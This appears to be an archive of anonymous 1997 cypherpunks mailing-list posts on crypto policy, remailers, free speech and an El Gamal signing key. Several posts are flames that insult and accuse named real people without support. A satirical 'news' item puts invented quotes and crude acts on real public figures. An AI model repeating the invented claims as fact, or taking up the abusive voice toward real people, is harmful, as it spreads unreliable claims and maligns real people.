Hey, Declan, do they have any yellow stars?  I understand we'll all be
wearing them soon and I want to beat the rush.
-----END CHEAP SHOT-----
Monty Cantsin
Editor in Chief
Smile Magazine
-288 288

@_date: 1997-12-05 05:35:37
@_author: Anonymous 
@_subject: A Question for Reporters 
Monty Cantsin wrote very sloppily:
That should have read:
Sorry about that, Chief!
Monty Cantsin
Editor in Chief
Smile Magazine
-28C 28C

@_date: 1997-12-05 05:46:37
@_author: Anonymous 
@_subject: A Question for Reporters 
At the same time Janet Reno makes these proposals, the
U.S. government, and this administration particularly, has done
everything in its power to undermine the development and deployment of
security enhancing technologies.
Not only has the use of cryptography been greatly hampered, but
TEMPEST equipment and knowledge is controlled, and there have even
been proposals to control secure operating systems.
Reno's statements and the administration's policies blatantly
contradict each other.  The very technologies which would solve the
problem Reno raises are being discouraged at every opportunity by the
administration she represents.
My question is directed at Declan because he is handy, but any other
reporters are invited to contribute.  Why is this not reported
accurately?  Do you plan to write a story which explains to the
American people how the administration is not telling the truth?  If
not, why not?  Surely it is important for the American people to
understand what their leaders say and do.
Monty Cantsin
Editor in Chief
Smile Magazine
-795 795

@_date: 1997-12-05 15:18:17
@_author: Anonymous 
@_subject: No Subject 
_________________________________________________________________
System requirements
   Kong will only run under Windows 95 and Windows NT or later.
Does the `or later' mean modern, safe software (like Linux), or what?

@_date: 1997-12-06 01:55:40
@_author: Anonymous 
@_subject: Censorial leftists (Was: Interesting article) 
Tim, that's only because the city didn't want to remove the ceiling of the
courtroom and hire a crane to lower her into the courtroom through the roof.
And they were busy trying to file charges against her for something else
entirely. See, she had chemicals within her body in a "quantity not
warranted by any legitimate purpose" and "which, when mixed, could be used
to produce nerve gas." They figured if she ever ate some beans those beans
might act as an ignition charge and...well, no more Santa Cruz.
It could have been worse (for her) though. They could have charged her with
"possession of a gas discharge device with intent to break wind."

@_date: 1997-12-06 03:47:42
@_author: Anonymous 
@_subject: McAfee on KRAP 
Old press release from McAfee boasting Key Recovery Alliance
    MCAFEE JOINS KEY RECOVERY ALLIANCE; MULTI-VENDOR GROUP TO
    CREATE INTERNATIONAL STANDARD FOR RECOVERY OF ENCRYPTION
                                     KEYS
    Key Recovery Alliance to Develop Solutions Which Balance
    the Needs of End- Users, Employers, and International
    Governments
    SANTA CLARA, CALIF. (December 12, 1996) -- McAfee (Nasdaq:
    MCAF), a leading vendor of network security and management
    software, today announced that it has joined the Key
    Recovery Alliance, a coalition of encryption software
    vendors who have joined together to promote international
    specifications for encrypted information. "As a member of
    the Alliance, McAfee will work to create an internationally
    recognized and widely available standard for trusted key
    recovery," said Dan Freedman, vice president of security
    products at McAfee. "Trusted key recovery enables the
    responsible deployment of encryption technologies
    worldwide, while addressing the valid interests and
    security requirements of end-users, employers, and
    government."
    McAfee recently extended its family of network security
    products with the introduction of three new encryption
    solutions. These solutions include PCCrypto for encryption
    of desktop computer files and electronic mail; WebCrypto
    for the encryption of Internet email; and NetCrypto for
    transparent encryption of all communications over TCP/IP
    networks such as corporate intranets and the Internet.
    The Key Recovery Alliance was formed in October, and is
    composed of approximately 40 different network security
    vendors who have joined to cooperate on the development and
    promotion of internationally-accepted standards for
    encryption key recovery. Encryption keys are the codes that
    unlock encrypted information. Encryption key recovery
    refers to the necessary ability to recover lost or damaged
    encryption keys. Common situations in which encryption key
    recovery would be needed include when the death or
    departure of an employee who maintained mission-critical
    encrypted information causes the encryption key to be lost;
    when an encryption key becomes damaged due to a hard disk
    crash; or when a court order warrants the decryption of
    computer-based evidence.
    Company Background
    Founded in 1989, McAfee is a leading worldwide vendor of
    Network Security and Management products for enterprise
    networks. The Company is also a leader in Internet and
    Web-based electronic software distribution. McAfee is
    adquartered in Santa Clara, California and can be reached
    by phone at (408) 988-3832 or by fax at (408) 970-9727.
    McAfee's Web address is

@_date: 1997-12-06 07:52:31
@_author: Anonymous 
@_subject: Singapore & Freedom 
> I lived and worked in Singapore for 8 years.  Singapore is not
what I call a free society.  Their system has many advantages,
you are pretty much free to make money providing you are doing so
in an area where the government has no interest.  The Singapore
government runs many enterprises and if you happen to be their
competition they will tear you apart to get rid of the
competition.  The Singaporean government tends to cater to the
multinational corporations, who were their earlier ticket to
economic prosperity, and don't do a lot to encourage local grown
business other than to provide a suitable environment for
business, which is good enough on its own.
Singapore is a great place to do business, yours costs are
predictable, something you can not say about the surrounding
countries where corruption makes costs unpredictable.  Singapore
labor is reasonably priced, well-educated, reasonably trained,
and well-disciplined - or at least they don't talk back or
complain unless you try something really stupid.  Singapore
management is expensive, well-educated, but not quite as
versatile as westerners.
Singapore is a social experiment, a group (read PAP) has gained
control and decided to mold the society into something different
than it was.  This is probably a good thing as in the 50s
Singapore was a cesspool, in many ways.  The story goes that you
could smell Singapore 200 miles out, in an airplane.  Everything
that Singapore is today is what it was not in the 50s.
The educational system has been engineered to produce the maximum
number of worker units.  Being a small country with limited
resources (with labor being the main exportable resource) they
could not afford to have an educational system which allowed some
potential worker units to drop-out.  Compare this against the
American system where you are free to succeed, or free to fail,
the choice is basically given to the citizen.  In Singapore this
is not how it works, the blinders are installed early, you are
not permitted to fail to become a good productive member of the
society.  In Singapore you are free, as long as you are a good
productive member of the society.  Try talking back and
complaining about the system and see where that gets you?  I
think they call it Woodbridge.
This social engineering may be a good thing.  Look at the
benefits obtained by Singapore.  In the current economic meltdown
in SE Asia Singapore is only threatened with lower growth.  The
people are happy and they love their country and government, to
the average Singaporean the government can do no wrong.  Most
Western governments would love to be in the same position.
There are costs associated with an engineered society of this
type.  Elder Statesman Lee, he went by Harry Lee before he
learned Mandarin, is always ranting about all the good genetics
being wasted as there is a large number of educated women who
have not married and therefore are not able to reproduce.  Harry
has been ranting about this for more than 10 years.  In a
nutshell certain segments of the population have lost their
ability to mate.  The Singapore government has initiated a
program to help educated Singaporeans find mates.  Great system,
economic prosperity, but what am I supposed to do with this
Don't forget the other good points, no guns or bullets, color
copiers are (were?) restricted, all media controlled by the
government (even Time magazine was banned), mandatory savings
program (CPF), National Service, and the government attitude of
those that are not with us are against us.  Also, don't forget
that the Singaporean government has brought the Big Brother
concept to reality.

@_date: 1997-12-06 09:33:31
@_author: Anonymous 
@_subject: words have value, for good or ill 
What Tim May actually wrote on May 9, 1997, was:
This is not a matter of "understanding" McVeigh's actions.  This is a
matter of agreeing with them, of becoming convinced that he did the right
thing.  It is a totally different position.
Consider: anyone might legitimately say they could understand why the
government opposes access to cryptography.  It represents a threat to
their monopoly power.  But if someone said they were becoming convinced
that restrictions on access to crypto were a good thing, we'd be attacking
them in an instant.  These are two completely different issues.  One is
a matter of understanding evil motivations, which we can all benefit by.
The other is a matter of advocacy of evil.  That must be opposed, and
in fact this list has been a strong force for such opposition.
When Tim May was explicitly offered an opportunity to repudiate his earlier
statement, he refused.  He wrote, in response to that offer:
So there it is in black and white.  Tim May refuses to withdraw his
earlier comments about becoming convinced that McVeigh did the right
thing.  He means what he says and he says what he means.  Yet he attempts
to characterize them in other messages as a matter of "understanding"
McVeigh's actions.  He is trying to have it both ways: powerful rhetoric
followed by mealy-mouthed temporizing.
Perhaps the answer is simply that May does not agree with his earlier
comments, but is too much of a coward to admit that he was wrong.
These mis-characterizations of his views are his attempt to amend and
correct them without having to concede that he, the great Tim May,
made a mistake.
This would not reflect very well on him, but it may be consistent with his
character.  Has May ever admitted to a mistake on any non-trivial matter?
Perhaps not.
The problem this raises is that it is difficult to know where May stands
on any issue.  He makes contradictory statements, refuses to reconcile
them, even refuses to admit that they are contradictory.  Which is his
true view?  No doubt, whichever one turns out to be most convenient in
the end.
What a weak and childish individual this is, this man who is said to be
the most respected of the cypherpunks.

@_date: 1997-12-07 03:24:56
@_author: Anonymous 
@_subject: Hate speech in Germany... 
I believe this is exactly what Mr. Frissell had in mind.
Incidentally, I heard that last year there were a series of raids on
bookstores for "hate" literature.  One of the books seized was Art
Spiegelman's "Maus".  The justification was that it glorified
violence.  (Feel free to correct me if this is baseless rumor. ;-)
!!! It sounds as if in Germany one may not discuss even the most basic
political philosophy without violating the law.
I'm not sure what is meant by "calling for the abolition of human
rights".  What would be some examples of things somebody could say and
what would be the penalties?  (Presuming you are allowed to give
examples, that is.)
This is exactly correct.
Another good point.  Many in the U.S. have become so accustomed to
these speech restrictions that it seems normal.
Monty Cantsin
Editor in Chief
Smile Magazine
-957 957

@_date: 1997-12-07 03:38:41
@_author: Anonymous 
@_subject: words have value, for good or ill 
A ghost speaking through the medium of replay.com communicated:
I see the list as a place to discuss ideas rather than as a propaganda
vehicle or a political party.
Next you'll be telling us we should not obediently follow his every
command!  Whose side are you on?
You might be happier if you did not associate with a group of weak and
childish individuals.
I have no doubt that Tim May contradicts himself from time to time.
And, when he changes his mind he does not announce it to the list and
carefully credit each person who influenced his views.  Sometimes he
is insensitive or even rude ("chop chop").  I've never seen him
apologize, either.  Probably he doesn't have the circuits to do it.
But, so what?  He's still the most interesting contributor to the
list.  I can well understand why you don't put him in your killfile.
Perhaps instead of name calling, you should actually address a point
or two and discuss it.  If you think McVeigh did the wrong thing, it
would be interesting to hear why.  And it would interesting to hear
why you believe that a McVeigh killing innocents is wrong, but a
U.S. Air Force doing the same thing is right.
Monty Cantsin
Editor in Chief
Smile Magazine
-937 937

@_date: 1997-12-07 10:22:32
@_author: Anonymous 
@_subject: Anonymous Thread 
All true.  But, in the case of the anonymous post there has usually
been no indication other than writing style and topic that suggests
the poster is using the context of previous anonymous posts.  There's
no particular reason to think the second post has anything to do with
the first.
This means that the ideas cannot be developed to any great depth or
detail.  I would prefer to see anonymous posters include the messages
which supply context or just give the message IDs.
Actually, it's the context and the complexity of the text that
interests me.  If ten different people play the role of anonymous in
one thread, each accepting the context of the previous posters, there
is no reason why that isn't just as interesting as if it were one
And even then it never hurts to think carefully about why they should
be trusted, how it is that they know what they claim to know, and if
there are any ways to verify their claims.
That's okay, though, because you deal with each post on its own merits
one at a time.  If person "C" says "This posts uses the remarks by the
anonymous poster in posts 1, 2, 3,.. as context" then you can say,
"You now say X, but before you said Y, and that's a contradiction."
That person (or even another person) can come back and say something
genuinely interesting like "It seems like a contradiction, but in fact
it isn't for such-and-such a reason."
In practice the way people have been doing this is just by signing
their posts "TruthMonger" or something.  But, message IDs give you
more control over the accepted context.
Sabotaging a non-persistent identity through a remailer is effortless.
Forging takes a little more effort.
But, yes, I would like to see more people signing their messages.  It
would reduce some problems.
Monty Cantsin
Editor in Chief
Smile Magazine
-1110 1110

@_date: 1997-12-07 15:14:00
@_author: Anonymous 
@_subject: New key 
Some readers have suggested that my El Gamal key values were not chosen
correctly.  My previous key used a random large prime, but Schneier suggests
choosing one with a guaranteed large prime factor ("Applied Cryptography",
section 11.6).
To correct that I offer a new El Gamal key which I will use for signing:
p: F64257B7087F081772A2BAD6A942F305E8F95311394FB6F16EB94B3820DA01A756A314E98F4055F3D007C6CB43A994ADF74C648649F80C83BD65E917D4A1D350F8F5595FDC76524F3D3D8DDBCE99E1579259CDFDB8AE744FC5FC76BC83C5473061CE7CC966FF15F9BBFD915EC701AAD35B9E8DA0A5723AD41AF0BF4600582BE5F488FD584E49DBCD20B49DE49107366B336C380D451D0F7C88B31C7C5B2D8EF6F3C923C043F0A55B188D8EBB558CB85D38D334FD7C175743A31D186CDE33212CB52AFF3CE1B1294018118D7C84A70A72D686C40319C807297ACA950CD9969FABD00A509B0246D3083D66A45D419F9C7CBD894B221926BAABA25EC355E9320B3B
g: E2CFFC96515A65D45B61F3E98DBD19859C7DEFAD7C43D8365363275A2C35BC09F20F68918C806AE67CBB04215E6B077EB1AF86ED71C62587C1631D1623744CFFAFDBB89F0FE95C907036F2FCB5EA3DA00E42BA8D703F75EEA69399E5541E86A89759CE55EFE2ECCD0AB73997CF9A060BD163590A4477F03E728CD0015223DFCA5533D8A7BE7E9B270827AE32EE2AB63BD8062DB91FBDB079AF416528C0AAD554835BA35B55B18EFDF76251ED00824CAD980A06E68B2D01C60FC58AC3C6C8341ADAB1490EE00F358C8BDFA3C305A4155A8DCB7B9E6A09F9102EEB407759E6DD4D10057D9C028FDCD47F269ABFC583B76A0AE7738950CABB5AD63FBC1B52958401
y: 864E4504E5DDFE2E9E96997526D020897FC24316FF9345AEF8F18AC9132DE0CED2D60D6A262BA143F68FABABBE3770CBC095D04DFDB56C93CE90F6D603D3E6B485FFE7654F600E55709352E691643D9C70AC1FFCDD8A8F6CDD0699563A260B0846C9ED756D6FFD81AB6CA4CEADA966CE19AF128D2B99771C3F1D48A72D69622A119081FD9E970CE1AF12CBAA27C565F7C2E3477EFC477CF884DC56A0753643C34DEA4A77ECC3B576DB2B167691D698422DF633D6F148E73E4AA0A573B2D61304E749157EAA563E3839E14459CE6E2BA1C193FD9B02010E91449C84EA47C842F6EE9B1040B713967267A789CC4945074332A4894C99DD910AB6D59701B256FBB6
This prime value has been chosen so that (p-1)/2 will also be prime.
I will continue to use Cantsin Protocol No. 2 as before.  It's good to
see that others are beginning to develop tools to use this protocol.
Suggestions for improvements continue to be welcomed.
Monty Cantsin
Editor in Chief
Smile Magazine
-907 907

@_date: 1997-12-07 23:29:01
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
I've done it several times, but you seem to be stuck in transmit-only mode.
My "demand" is that you explain YOUR motives for your written demands to Jeff
Burchell that he violate the privacy of ALL of the users of his remailer by
turning over his logs to you and Belinda Bryan , listing the name and address of EVERYONE who either SENT or RECEIVED anonymous e-mail from the Huge Cajones Remailer.  If you don't like hearing that, then you'd better stop asking the same question over and over.
It quite obviously took you by surprise that Jeff chose to reveal to all of
his users just what you and Belinda had attempted.  Did you not want remailer users to know what you'd tried to do?  Contrary to your accusations, not all of Jeff's post was "speculation".  The attempt by staff members of DataBasix to
circumvent the security of the Huge Cajones remailer and violate the privacy of its users was a very FACTUAL statement which you have neither denied nor explained.  No one has to take my word for it.  Anyone who cares to can read if for himself:
   at toad.com/HTML-1997-11/msg00536.html
[Although Gary Burnore has chosen to have his side of that thread removed from
 the archives (for reasons known only to him), Jeff's comments can still be
 found using DejaNews and searching their "old" archives]:
   at wired.com&svcclass=dnold&defaultOp=AND&maxhits=20&ST=QS&format=terse&site=dn
My demands?  To keep the remailers open and usable.  Of the two of us, I'm the
only one who is actually using them (or at least admitting to it).  You're the
one with the least to lose if more get shut down due to harassment of the type
you, Belinda, and William J. McClatchie subjected Jeff Burchell to.  OTOH, if they get shut down, I'd lose my ability to post anonymously and challenge the assertions and false accusations of people like you.  Your pitiful attempt at logic makes no sense.
You've been invited, on several occasions, to start your own remailer if you
REALLY think they're valuable, and you claim to have so much insight into how they "ought to be" run.  You still have not done so.
As for "giving remailers a bad name", perhaps most users would rather they be
usable, full-featured, reliable, secure, and uncensored than that they have a
"good name" with censorious people like you, DataBasix, Janet Reno, and the Church of Scientology.  When have dissidents ever desired a "good name"?  When has being popular ever been more valuable than being free?

@_date: 1997-12-08 09:34:58
@_author: Anonymous 
@_subject: New key 
It is somewhat ironic that you would create a key on this particular
weekend.  I trust you will not mind if I use the older key.  Probably
anybody with the resources to crack it has something worthwhile to
say. ;-)  (Caught that little trick in the selection of g.  Cute!)
I'll try to maintain the high standards you've set for the key,
although it is likely these efforts will fall short.  I've admired
your well thought out, informative, and modest posts for some time
Monty Cantsin
Editor in Chief
Smile Magazine
-3F0 3F0

@_date: 1997-12-08 22:13:42
@_author: Anonymous 
@_subject: Remailer Trivia / Re: Singapore & Freedom 
Doesn't Anonymous have a brother, Neal? Isn't he a playwrite, or
author, or something?

@_date: 1997-12-09 05:01:17
@_author: Anonymous 
@_subject: Complete package for Cantsin Protocol No. 2 
I've been looking this over and it's a nice job.  The code is clean
and orderly.  I haven't had a chance to play with it yet, but it looks
like everything is done the right way.  For example, it doesn't tell
you how many valid signatures a file has, it outputs a fragment of the
file for each valid signature.  The database of known keys has the
nice property that you can name each key anything you like.
The source code is completely unencumbered.  This is great!  For some
reason, it has been the custom to issue free software with all sorts
of restrictions, in particular restrictions which hamper its
commercial use.  But, if we are giving it away to people so they will
use it, why restrict it?  If somebody can use it to start a cypherpunk
company, this is a Good Thing.  (This can even be a Very Good Thing
for the original programmer. ;-)
It might be a good idea to publish the SHA1 checksum of the file you
are distributing.  The checksum of the file I got (cantsin.tar.gz)
was: D054C9E4ABD5CEE0C5A4343E5D1E2EF91C00048A
I may not approve of the restrictions on free speech in Germany, but
at least the German government isn't trying to stop people from
publishing arithmetic.  The truth is, that for Monty Cantsin's
activities, he would get a better deal on free speech if he were
Monty Cantsin
Editor in Chief
Smile Magazine
-680 680

@_date: 1997-12-09 10:59:58
@_author: Anonymous 
@_subject: Another of Gary Burnore's Lies Exposed 
^^^^^^^^^^^^^^^^^^^^^^^^^
Uh, oh!  Head for the hills!  Our secret is out!  We have all of these
remailers and they only have ONE USER. Most control freaks like Gary Burnore and the rest of the DataBasix Gang are
hypocritical about privacy.  They want to invade that of others at will while
protecting their own.  Gary Burnore and Belinda Bryan were worried that their UNLISTED PHONE NUMBERS might be given out, but anyone
who dares criticize their actions with an "unlisted" e-mail address is an
"anon asshole".
OK, let's make Gary happy.  If he's so worried that my asshole is "anonymous", I guess I'd better give it a name -- "Burnore" sounds about right to me.  So
to all control freaks -- "stick it in your Burnore".
I'm still wondering what wondrous plans Gary and Belinda had for all
those e-mail addresses of the users of the Huge Cajones Remailer if Jeff
Burchell had turned them over to DataBasux as they had demanded.  (Not just the
senders but the RECIPIENTS as well!)  Fortunately, Jeff was smarter than your average Burnore and didn't keep such things around to tempt DataBasix, Scientology, etc., so we'll never find out.

@_date: 1997-12-09 22:18:11
@_author: Anonymous 
@_subject: Crypto Law Survey updated 
There will be some people knocking on your door at 4 a.m. to take
you downtown and explain it to you.

@_date: 1997-12-10 04:09:04
@_author: Anonymous 
@_subject: [RePol] ABCnews/Nightline on Cyber Terror 8-Dec-97 
Is it not funny how this theme of the "government and the private sector" working together is becoming a worldwide theme, just as the
theme of "cooperation between governments" is also becoming a universal
  Can you say, "Fascism?" Sure you can...
  Can you say, "New World Order?" Sure you can...
  Can you say, "Bend me over and stick a crowbar up my ass?"...

@_date: 1997-12-10 04:47:29
@_author: Anonymous 
@_subject: Encrypted InterNet DEATH THREAT!!! / ATTN: Ninth District Court Judges / PASSWORD: sog 
If memory serves me correctly then the above was written by the
John Gilmore cleverly disguised as TruthMonger who railed mightily
against the LEAs for claiming lack of resources and manpower for
battling the 4 Horsemen despite the fact that LEAs always seem to
have all the time and energy needed to attempt to imprison the
grandmothers of our great nation who dare to plug a stranger's
parking meter for him or her.
I am always amazed that the LEA pleas for increased funding are
generally based upon their own lack of effectiveness.
i.e. "We are so lame that even with the current mountain of money
and resources at our fingertips we cannot catch criminals who are
much smarter than us."
Perhaps the solution to crime is to fire the current LEAs and hire
the criminals to replace them.
Not that I am a troublemonger...

@_date: 1997-12-10 05:47:58
@_author: Anonymous 
@_subject: No Subject 
Last week soon after I took a KRAP, I cracked IDEA using
my Windoze calculator in 2.7 hours, smoked a pipe bomb I made from a formula I found on the internet, got invited onto the Jerry Springer Show to embarrass myself but a midget without arms somehow put me in a headlock.
  I love being on the Cypherpunks list!!!

@_date: 1997-12-10 06:43:52
@_author: Anonymous 
@_subject: Cato forum tomorrow: should money laundering be a crime? 
Hash: SHA1
This is true, but it is only part of the picture.  The paper currency issuer (the central bank) is enjoying seigniorage, that is -- in the case of the US

@_date: 1997-12-10 14:51:54
@_author: Anonymous 
@_subject: Court TV 
[CANADIAN NUTLY NEWS-Bienfait, Saskatchewan]CINDY COHN, LEAD COUNSEL
for the Bernstein free-speech encryption case, and part-time barmaid
at the Coaldust Saloon, denied that her successful efforts to have Court TV release only footage that shows her "good side" conflicts
with her client's interests.
Swatting at the drunken hand of Louis Freeh as he made repeated attempts
to grab her ass, hollering, "THIS is your GOOD SIDE, baby!", Cohn noted
that the government was making claims that the solution to the DOD's
admission of having made the physical and financial security of the nation and its citizens vulnerable to teenage hackers is to suppress the rights of the citizens to engage in free-speech.
"If the government can engage in this type of deliberate masking of reality, then I should be able to hide my mole...dimple...", Cohn
corrected herself.
Scott McIntosh, appellate counsel for the Justice Department, who was
drunkenly groping Freeh's ass while his attention was diverted, was
trying to explain to local reportwhores that the basis of the U.S.
government's case was not "prior restraint," but was, rather, "a preventative 'First Strike' against the danger of free speech in the hands of an unmonitored public."
Louis Freeh, once again missing Cohn's tail end, but catching the tail
end of McIntosh's statement, slapped him upside his head and screamed,
"You're not supposed to tell them that, you fucking moron!"
"John Gilmore, facing heated questions regarding his alleged anonymous
death threat against the Ninth District Court judges, told reportwhores,
"I'm not TruthMonger! I'm...Dimitri Vulis...yeah...and I'm dating
Morgan Fairchild."  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  The Canadian Nutly News is provided as a public service under the
  alleged auspices of the Electronic Forgery Foundation. Any misuse
  of the information provided by CNN is probably highly redundant.

@_date: 1997-12-10 22:55:23
@_author: Anonymous 
@_subject: M$ 
On the frontpage of the USA Tomorrow:
- Finalized is the merger Mr. T and NWO, Inc iniatied with Microsoft.   Sources for the NWO, Inc. said that with attitude of Mr. T and the
  Microsoft domination of computers would help in helping citizens
  confirm to their idiotic ideas.
- grubament studies have determined that electron ray showers from
  the distant plant QWERTY (2nd behind the Death Star) could contain
  obscene pictures or worse +467973 bit encrypted messages that can be
  received on the average watch calculator and so it should be destroyed
  to protect those without mechanisms to think for themselves.
- the chief fireant in charge of the DNA Supercomputer is quoted as
  saying that the 'BendOverAndPayYourTaxes Bull' (TM) algorithm had
  found that of all the shit politicians make up there worse is the
  shit that won't flush.
- In Rhode Island it is a felony punishable my 10 years and/or a
  e$10,000 fine to have or have knowledge that a person is thinking
  about an immoral act.
- Jerry Springer, their chief journalist, confirmed with pictures of the   rumors that Bill Klinton WAS associating with a Cypherpunk to be   Indicted Later at Brooklyn Zoo speaking in the non-decryptable tongue
  of language Ebonics.  The transcript of the meeting was given to a
  fireants at the DNA Supercomputer Lab in a slight hope of finding out
  what was said.

@_date: 1997-12-10 23:54:29
@_author: Anonymous 
@_subject: Gary L. Burnore's Paranoid Hatred of Privacy and Anonymity 
You go first, since you claim you "have nothing to hide".  Why would anyone
with "nothing to hide" choose to "hide behind the skirts of" an unlisted phone
number and street address? (Recognize the rhetoric?  It's yours, not mine.)
I posted the URL.  What part of it was a "lie"?  Are you now denying that you
demanded that Jeff Burchell turn over the sendmail logs from his Huge
Cajones Remailer to you and Belinda Bryan?
Haha!  Nice try at IKYABWAI.  I guess that's the best you at DataBasix can do
to try to divert attention from your activities and tactics?  You and Belinda
were the anti-privacy control freaks who supposed that Jeff had created and
maintained logs for abusive organizations like DataBasix and the Church of Scientology to demand.  Jeff knew better all along and didn't keep such info
to tempt people like you.  Had you done your homework rather than blindly
attacking Jeff and his remailer, you'd have known that such data didn't exist
and could have saved yourselves the embarrassment of being caught trying to
demand it.
You still haven't stated your reason for demanding these logs which, had they
existed, would have identified everyone who either sent or received
anonymous messages through the Huge Cajones Remailer.  What wonderful surprises
lay in store for remailer users after their identities had fallen into your
Jeff Burchell NAMED his attackers.  Would you care to point out my name in his post? (Yours is named rather often.):
   at toad.com/HTML-1997-11/msg00536.html
Your paranoid conspiracy theories remind me of the kid who blamed the mess in
his bedroom on an invisible herd of stampeding elephants.  ("Well of course
you didn't see them, dad.  They're INVISIBLE.")  In your case, you speculate that there's a single "anonymous asshole" who's responsible for everything that you CLAIM has occurred.  The problem is, you haven't proven that 90% of the stuff you *CLAIM* occurred even happened, let alone was the work of your imaginary lone "spam-baiting/forging/child-molesting/cyber-stalking/libeling"
(did I miss anything?) so-called "anon asshole".
How about some proof of your wild charges, Gary?  Only one of us even USES
remailers (or at least admits to it).  You, OTOH, have never had a civil word
to say about ANY anonymous poster.  If remailers were shut down, I'd lose my
ability to post.  What would you lose, Gary?  Is being able to identify your
critics and single them out for harassment really that important to you?

@_date: 1997-12-11 06:07:33
@_author: Anonymous 
@_subject: Burnore & Databasix 
You're denying that you, Belinda Bryan, and William McClatchie are staff members
of DataBasix?  Are you denying that McClatchie used unproven allegations of "forgery" as his excuse to campaign to get the upstream providers of Jeff Burchell's "Mailmasher" server to disconnect him?  Do you remember McClatchie's
post which said:
-> > I encourage anyone who is being forged due to the deliberate negligence
-> > on toxic's part to write hotwired and MCI asking that mailmasher be shut
-> > down until it can longer be used to commit forgeries.
Did you catch that -- "asking that mailmasher be shut down"?  Have your forgotten the time McClatchie was asked this question:
->  >>If that was done, then a complaint to the operator would have gotten
->  >>that particular pseudonym making the postings locked out.  But your
->  >>agenda seemed to be to get the entire server shut down.  Why?
To which he replied:
->  > Becuase the shithead running it pissed me off with his responce that "He
->  > had better things to do" and "Maybe i should learn mmail filtering" to
->  > avoid the abuse.
And then there's Jeff's account of what followed.  Do you remember when you asked him:
-> > : So are you suggesting that McClatchie did that all by himself?  Just
-> > : curious, I don't know the details.
And his response:
-> > Nope.  McClatchie posted a spammed message that was offering Pirated
-> > CD-ROMS for sale.  He just happened to send it to a number of companies
-> > that had software products included on the CD-ROM.  They in turn handed
-> > the matter over to the Software Publisher's Association, which then
-> > took their usual witchhunting activities to a new art form (including
-> > using a personal contact at Wired for professional "gain")
You said that it was the "anti-remailer front" that was using this alleged "abuse" to get remailers shut down, but McClatchie was the one named by Jeff of playing that very role.
I'd like to hear more about this "anti-remailer front" you speak of.  Thus far,
you've claimed that all the anonymous posts that have criticized you have all come from the same person.  That doesn't sound like much of a "front".  How about
some more NAMES?  Who else is involved in this "front"?
Posting REPORTS of disinformation is not disinformation.  You have posted
no proof for any of your disinformation.  For example, your unsubstantiated
claim that someone (you actually accused someone by name) of sending abusive
e-mail, via a remailer, to an unnamed "teenage girl" who supposedly had a web page at DataBasix.  Where is your proof of that accusation?  Saying that an
anonymous person "abused" an unnamed victim is pretty flimsy, don't you think?
Then Belinda Bryan came along and claimed that this same person had supposedly
forged posts through an anonymous remailer in the names of "every known email address of DataBasix staff and  customers".  Again, no evidence that it even occurred, nor even an explanation of how someone OUTSIDE of your company would get ahold of that kind of confidential information!
You're forgetting Mailmasher and McClatchie's hissy fit to get it shut down?
Free speech is now "harassment"?  (Only in the world of DataBasix!) If you didn't want people talking about the things you've done, you shouldn't have done them in the first place. Exactly what "harassment" are you alleging?  You mean posting replies to you and
answering the questions you asked?  You whine for "proof" then scream "harassment"
when it is posted.  Cute.
You obviously have a short memory.  Your letter to Jeff Burchell demanded that
he turn over his logs to you identifying everyone who had sent and received
anonymous e-mail through his remailer.  This was MONTHS after you whined about
alleged "forgeries" and were told about having your name blocked upon
request.  Unless you deliberately avoided taking the advice you had been given
then blocking your address would have been a non-issue by June, since you were
whining about "forgeries" in February.
Or are you talking about your attempt to get posts that even MENTIONED your name
in the body blocked?
Claims?  I asked a QUESTION. What use did you have in mind for Jeff's remailer
logs which you demanded?  Since you refuse to answer, let me repeat Jeff's
theory.  If it's incorrect, please feel free to correct it:
-> Subject: Re: DataBasix vs. the Remailers -- Gary Burnore's Dirty Tricks Exposed (was: Jeff's Side of the Story.)
-> From: toxic at hotwired.com (Jeff Burchell)
-> Date: 1997/07/02
-> Message-ID: <5pc9mb$omg$1 at re.hotwired.com>
-> -> [...]
-> -> : > Mr. Burnore requested a copy of my (non-existant) logs.
-> : > I told him to get me something in writing, signed by his lawyer that
-> : > stipulated that the logs were confidential, and not to be revealed to
-> : > anyone outside of the lawyer's office.
-> :
-> : He requested the logs of the messages of *EVERYONE* using Huge
-> : Cajones?  What was his rationale for such a fishing expedition?
-> : (Cases like this are a good reason for remailers to NOT keep logs.)
->  -> I have no idea of his rationale.  And I don't know of any remailer
-> operator who keeps logs that would identify a user.  I had my machine
-> configured to log in a fairly standard way, but I used a different  -> sendmail configuration for the remailer, that had all logging (except
-> for certain error conditions) turned off.
->  -> Part of me thinks he wanted the logs so he could tell if I was going
-> to be able to identify him when he started his attacks.
Go back and reread the post.  It was the power to demand that Jeff turn over (non-
existent) logs to you and Belinda that you didn't have.  The rest makes no sense, because it's quite obvious that the remailer is SHUT DOWN.

@_date: 1997-12-11 12:44:59
@_author: Anonymous 
@_subject: alias.cyberpass.net 
Is alias.cyberpass.net down or no longer active?
I can send mail but not receive anything not even a confirmation.

@_date: 1997-12-11 20:08:47
@_author: Anonymous 
@_subject: Diffie-Hellman 
Timothy `C' May is another loser who pays for got.net because he lacks the mental capacity to gain net access as a perk of either employment or academic achievment.
     0
   \/|/\ Timothy `C' May
    / \/\
  \/

@_date: 1997-12-11 23:32:33
@_author: Anonymous 
@_subject: Gary L. Burnore's Paranoid Hatred of Privacy and Anonymity 
I'm glad you spotted that.  It started the other way around, with Gary Burnore
whining that people were "cowards" and "anonymous assholes" for not including
their e-mail addresses in their posts (thus indiscriminately broadcasting
them to the world), while his own telephone number is unlisted.
If he's so concerned about full disclosure and properly identifying everyone
that posts, then surely he won't mind posting his street address and home
phone number ... if he has "nothing to hide".   Personally, I don't care
what his phone number and address are.  I have no reason to call or snail
mail him.  I'm only calling his bluff concerning the premise "if you have
nothing to hide, then you won't mind disclosing everything".  If you're the
current contender in the DataBasix tag team, then the same challenge applies
to you.  Since Gary claims that he has blocked all e-mail from remailers,
apparently he does not wish to communicate with me privately.
So why should an unlisted e-mail address be any different than an unlisted
telephone number?  If I want you to e-mail me, I'll give you my address.
I don't.  So why should I broadcast my e-mail address?

@_date: 1997-12-12 00:59:50
@_author: Anonymous 
@_subject: Same old shit from Gary L. Burnore / DataBasix 
gburnore at netcom.com (Gary L. Burnore)
How is asking you a QUESTION a LIE?  Why won't you answer the question about why
you wanted the sendmail logs from the Huge Cajones Remailer?  What purpose did
you have in mind for all those names and e-mail addresses?
I trust that you have proof for that accusation.
Are you now saying that your previous accusation that rfg was your so-called
